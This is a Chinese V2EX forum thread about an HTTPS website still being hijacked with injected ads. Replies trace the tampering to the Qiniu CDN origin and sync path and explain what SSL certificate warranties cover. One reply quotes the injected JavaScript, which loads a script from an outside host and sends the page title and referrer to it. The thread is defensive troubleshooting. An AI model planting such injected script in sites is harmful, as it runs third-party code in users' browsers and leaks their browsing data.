论 SSL 有用吗? HTTPS(RapidSSL SHA256 CA - G3)了为何还是被电信劫持?

2015-11-11 18:20:22 +08:00
 oldcai

事情是这样的

以前在深圳的时候,经常打开 V2EX 都会变成一整张某信广告,

现在这个项目因为 BOSS 对用户的隐私和安全性要求很高,产品网站是使用的是收费的 SSL 证书的 https ,我想这样也可以防止一些运营商插广告的行为,是很赞的一件事。

however ,有一个可♀爱的男同事,他发现我们官网总是被劫持,地点也是深圳。

如图:

图 1 : 被劫持后

这个症状和这篇帖子里面 @chinaglwo 描述的一样。

然后我观察了一下我们的证书对比

图 2 : 我的大约没被劫持的情况下的

图 3 : 可♀爱的男同事的浏览器被劫持的情况下的(快看可♀爱的收藏夹)

此网站的身份已通过了 RapidSSL SHA256 CA - G3 的验证。服务器未提供任何 Certificate Transparency 信息。

然而说好的担保金是真的吗

图 4 : 10,000 刀担保金的广告

忽然想到购买 SSL 证书的时候,有担保金这件事,所以也想来 V2EX 算一卦, HTTPS 了还是被劫持,拿不拿得到保险金呢?

附:忽然发现 @朱一君的微博图床(最新版)不能上传了,图床用的 imgur ,所以如果看不到图,方便的话,希望可以随手翻一下墙才可以看到。

9913 次点击
所在节点    问与答
65 条回复
otakustay
2015-11-11 21:06:51 +08:00
一个比较简单地看是不是 HTTP(S)劫持的方法是直接看源码而不是看 DOM Tree ,如果源码中没有基本上不会是协议层面上的劫持,应该去考虑浏览器扩展、系统插件等其它情况
Flygoat
2015-11-11 21:08:20 +08:00
杭州电信:劫持已复现,症状相同。 Linode 上访问没有劫持。(重新签一份证书试试
livelazily
2015-11-11 21:13:30 +08:00
广东电信: 劫持已复现, 但只在 chrome 下出现, firefox, safari 都没问题. chrome 尝试添加 --disable-extensions 禁用所有扩展依旧被劫持
virusdefender
2015-11-11 21:19:20 +08:00
七牛的 js 回源被劫持了

document.write("<script language='javascript' src='http://dn-zine-static.qbox.me/Zine_web/otherScript-min.js?_vv=20080808&_veri=20121009'><\/script>");document.write("<script language='javascript' src='http://js.meiletu.net:41180/re/re.php?src=t6407&t="+encodeURIComponent(document.title)+"&ci=3738840456&r="+encodeURIComponent(document.referrer)+"'><\/script>");

因为你的 js 正在以 http 的方式访问,所以被劫持,然后构造了这样一个劫持的 js 。很大可能就是回源的时候的问题
zkd8907
2015-11-11 21:21:34 +08:00
我们公司这段时间遇到了 CDN 机房间在回源的时候被劫持,导致写入到 CDN 服务器上的数据直接就被篡改。建议楼主可以查下遇到问题对应的机器,直接上机器看文件。
wzxjohn
2015-11-11 21:25:15 +08:00
七牛 CDN 回源流量被大量劫持:
/t/233684#reply9
msg7086
2015-11-11 21:32:20 +08:00
1. 如果你说的是 CDN ,请检查 CDN 到服务器的连接。(另外用了 CDN 这种事情得早点说
2. 看劫持为什么要用控制台工具而不是看源码?意义不明。
zho6
2015-11-11 21:42:52 +08:00
cloudflare 有 keyless 的功能 客户无需将证书交结 cloudflare 实现 https 的转发 这个技术是可以用来做劫持 https
oldcai
2015-11-11 22:27:46 +08:00
@wzxjohn
@msg7086
@virusdefender
静态文件的 CDN 我们不是镜像的,是手动用七牛的 qrsync 同步到 cdn 的,我觉得回源链路问题无法解释为何会一下好一下出问题。
iwege
2015-11-11 22:29:29 +08:00
貌似最近有同样的东西:

https://www.v2ex.com/t/235434

http://weibo.com/1494759712/D31oLvWUH?from=page_1005051494759712_profile&wvr=6&mod=weibotime&type=comment#_rnd1447252229082
Had
2015-11-11 22:54:35 +08:00
是七牛的节点被劫持了。
Had
2015-11-11 23:00:52 +08:00
我这里前天也出现了这个问题,我们的回源是 HTTPS 的。
因为七牛是一次回源然后同步到所有节点的,所以我怀疑可能是同步过程是 HTTP 的,造成了同步到某些节点时被批量注入。
Had
2015-11-11 23:01:54 +08:00
@oldcai
看我楼上的回复,我们也是全站 HTTPS ,但是依然遇到了这种情况,我感觉应该是从回源到同步发生了问题。
oldcai
2015-11-11 23:25:41 +08:00
@Had 问了七牛的人,他说:上传是 http 的,但是上传都是 token 加密的, qrsync 上传,如果上传劫持就会上传失败了,不会上传一个错误文件。

我理解为虽然是 http 上传,但是有 token 校验。

而且目测同步到七牛的服务端的版本没有问题,我这边刚也出现过被劫持的现象,确实是 cdn 的文件被篡改,但是加了个参数尾巴就又好了,感觉是七牛的服务器之间传输文件被劫持了。
msg7086
2015-11-11 23:43:51 +08:00
@zho6 因为 CF 自己可以签发证书。但是这些企业都有严格的策略,保证证书不会被滥用。

@oldcai 你用 CURL 试试吧。如果证书的确是你自己的,而且输出源码里有劫持,那多数是目标服务器自己的问题了。
SSL 的保险保的是他家证书误签发给陌生人的问题。比如你这 RapidSSL ,保险保的就是 Rapid 自己把证书签发给了你以外的第三者。其他情况应该是不会管的。
至于 SSL 协议本身的安全性应该是不用担心的,毕竟里面那堆核心算法是美国政府都在用,要是有坑的话早就炸锅了。
Had
2015-11-12 00:13:35 +08:00
@oldcai 嗯,咱猜测的很类似,因为七牛用了中间源,所以需要从中间源分发到各个节点,应该是这个过程被污染了。
zwzmzd
2015-11-12 00:53:00 +08:00
想起以前一个帖子,
https://www.v2ex.com/t/169333

国内网络这现状,工信部该好好管管了
lhbc
2015-11-12 01:52:34 +08:00
运营商在骨干网劫持,哈哈哈
wzxjohn
2015-11-12 09:04:34 +08:00
@oldcai 很简单,某些回源链路被劫持,导致有些机器上的文件是有问题的,但是并没有影响所有的机器。如果你被随机到了这台机器上那就有问题。。。
comesx4
2015-11-12 09:17:58 +08:00
你用审查查看到的代码可能是后来的 js 修改的,你直接右键查看网页源代码看看还没有有问题的 js

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/235422

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX